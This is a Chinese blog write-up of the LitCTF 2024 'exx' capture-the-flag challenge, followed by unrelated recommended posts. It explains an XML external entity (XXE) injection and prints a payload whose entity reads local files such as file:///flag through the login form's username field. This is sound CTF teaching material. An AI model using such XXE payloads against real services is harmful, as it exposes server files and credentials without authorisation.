[LitCTF 2024]exx

桑榆百川

于 2024-08-11 18:08:24 发布

阅读量293

点赞数 2

文章标签： xxe 网络安全

本文链接：https://blog.csdn.net/2301_81462177/article/details/141108022

版权

输入任意账号密码进行抓包

考查xxe漏洞

我们加入xxe语句并让它回显我们要它会显的东西：先来读取一下用户名和密码

我们可以看到，它已经读取了服务器下的账号密码文件，接着我们直接读取根目录下的flag文件。通常情况下flag文件的位置一般就根目录和var/www/html目录之下或者是其父目录之下。存在的形式一般为flag、flag.txt、flag.php

<?xml version="1.0" ?>
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM  "file:///flag">
]>
<user>
	<username>&admin;</username>
	<password>123</password>
</user>

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

桑榆百川

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

探姬杯LitCTF2024（Web方向）

Zue3r的博客

06-02

870

探姬杯LitCTF2024（Web方向）

LITCTF2024-6月web方向wp

Perterluck的博客

06-02

1026

这个题目考察XXE注入，这个从题目就可看出来（翻转一下就可），了解一下XXE注入，主要了解XML格式和其中DOCTYPE还有主体ENTITY的定义，重点利用的是外部实体注入攻击，因为服务器会直接将xml传送的内容做引用，这样便可以通过一些伪协议找到flag。dict:// 字典服务器协议，访问字典资源，如，dict:///ip:6739/info：注意这个协议使用的前提是服务器的端口可以拿到，这个没啥好方法，除非直接告诉你否则就爆破吧。这个就是一个反序列化，没啥好说的，直接按照要求就可拿到flag。

参与评论您还未登录，请先登录后发表或查看评论

LitCTF2024WP

qq_67760645的博客

06-02

1155

LitCTF2024的解题思路

LitCTF 2024（公开赛道）——WP

ASD830的博客

06-02

2149

目录Misc涐贪恋和伱、甾―⑺dé毎兮毎秒你说得对，但__盯帧珍珠Everywhere We Go关键，太关键了!女装照流量原铁，启动！舔到最后应有尽有The loveWebexx一个....池子？SAS - Serializing Authentication System浏览器也能套娃？高亮主题(划掉)背景查看器百万美元的诱惑Reverse编码喵Cryptocommon_primes题目只给了一张图片，zesteg秒了，flag：LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5b

LitCTF 2024（公开赛道）部分 wp

焦虑的焦虑

06-04

2364

LitCTF 2024（公开赛道）部分 wp

LitCTF2024部分wp

oyf3085227433的博客

06-02

1297

又是被大佬带飞的一天

EXX11901.zip

05-01

标题中的"EXX11901.zip"表明这是一个压缩文件，使用了ZIP格式进行打包。ZIP是一种常见的文件归档格式，它允许用户将多个文件和文件夹组合成一个单一的压缩包，以便于存储、传输和管理。这种格式通过数据压缩算法减少...

JAVA exx与exe转换器

07-07

双击后自动把目录下的所有exxW文件转换成EXE包括子目录里的，如果没有EXX则自动把exe转换成EXX

NVR_78_79_EXX_V3.4.90_161008

12-12

程序包适用于以下型号： DS-7804/08/16N-E1、DS-7804N-E1/4N、DS-7804N-E1/4P、 DS-7808/16/32N-E2、DS-7808/16/32N-E2/8N、DS-7808/16/32N-E2/8P、 DS-7816/32N-E2/16N、DS-7816/32N-E2/16P、 ...

DS-76xxN-Exx DS-78xxN-Kxx DS-NVR-K1xx DS-NVR-K2xx V4.30.210 Bui

08-30

DS-76xxN-Exx DS-78xxN-Kxx DS-NVR-K1xx DS-NVR-K2xx V4.30.210 Build201224- V4.31.000 Build210511

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8534

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

mobilenet模型-基于人工智能的卷积网络训练识别自驾旅行路标-不含数据集图片-含逐行注释和说明文档.zip

最新发布

11-07

本代码是基于python pytorch环境安装的。下载本代码后，有个环境安装的requirement.txt文本首先是代码的整体介绍总共是3个py文件，十分的简便本代码是不含数据集图片的，下载本代码后需要自行搜集图片放到对应的文件夹下即可需要我们往每个文件夹下搜集来图片放到对应文件夹下，每个对应的文件夹里面也有一张提示图，提示图片放的位置然后我们需要将搜集来的图片，直接放到对应的文件夹下，就可以对代码进行训练了。运行01生成txt.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集运行02CNN训练数据集.py,会自动读取txt文本内的内容进行训练，这里是适配了数据集的分类文件夹个数，即使增加了分类文件夹，也不需要修改代码即可训练训练过程中会有训练进度条，可以查看大概训练的时长,每个epoch训练完后会显示准确率和损失值训练结束后，会保存log日志，记录每个epoch的准确率和损失值最后训练的模型会保存在本地名称为model.ckpt 运行03pyqt界面.py，就可以实现自己训练好的模型去识别图片了

【超强组合】基于VMD-混沌博弈优化算法CGO-Transformer-LSTM的光伏预测算研究Matlab实现.rar

11-07

1.版本：matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点：参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象：计算机，电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。替换数据可以直接使用，注释清楚，适合新手

农产品预售平台 SSM毕业设计附带论文.zip

11-07

农产品预售平台 SSM毕业设计附带论文启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B

【超强组合】基于VMD-樽海鞘优化算法SSA-Transformer-LSTM的光伏预测算研究Matlab实现.rar

11-07

非常好的电子设计小软件字库资料非常好用的软件.zip

11-07

非常好的电子设计小软件字库资料非常好用的软件.zip

从互联网产品经理到AI产品经理

11-07

人工智能人工智能产品经理的新起点三、人工智能的本质及脑洞 1. 未来5年左右，不超过10年，会出现下⼀一个低⾕谷（挤泡沫） ——因为缺乏why层⾯面突破+深度学习红利消退 2. 现在的AI，三个真正瓶颈：落地产品、 AI PM、团队升级 3. 近期的AI，三个破局思路：情感最优、⼈人机交互、研究最接地⽓气的公司 4. 未来的AI，三个根本性突破⼝口：图灵停机问题、量⼦子⼒力学、学佛 5. AI的本质：从⼈人类意识⽣生出，且必须和⼈人类交互/共⽣生，但⼜又独⽴立于⼈人类的、具备⾃自主意识的新物种形式 6. AI的效⽤用： 1）⾏行业⾓角度：不是突破效率瓶颈，⽽而是开启新⼀一轮的“流量-交易-效率”周期（健康快乐/个体意愿—>流量）； 2）⼈人类⾓角度：代替-撕裂-共⽣生 7. AI时代，政府会“更早或更深”的介⼊入

:1用丙纶纱仿造18.21exX18.21ex,311根/10cmX307根/10cm 棉细纺织物，要求保持原来的外观风格，若密度不变，则丙纶纱作业：的线密度应为多少？若纱线的线密度不变，则丙纶纱经纬密度应为多少？（若丙纶直径系数为0.049）

04-26

根据题目所给的数据，棉细纺织物的经线密度为311根/10cm，纬线密度为307根/10cm，以及线密度为18.21ex，即18.21根/厘米。首先需要计算出棉细纺织物的经纬线线密度：（311 + 307）/ 2 = 309根/10cm ...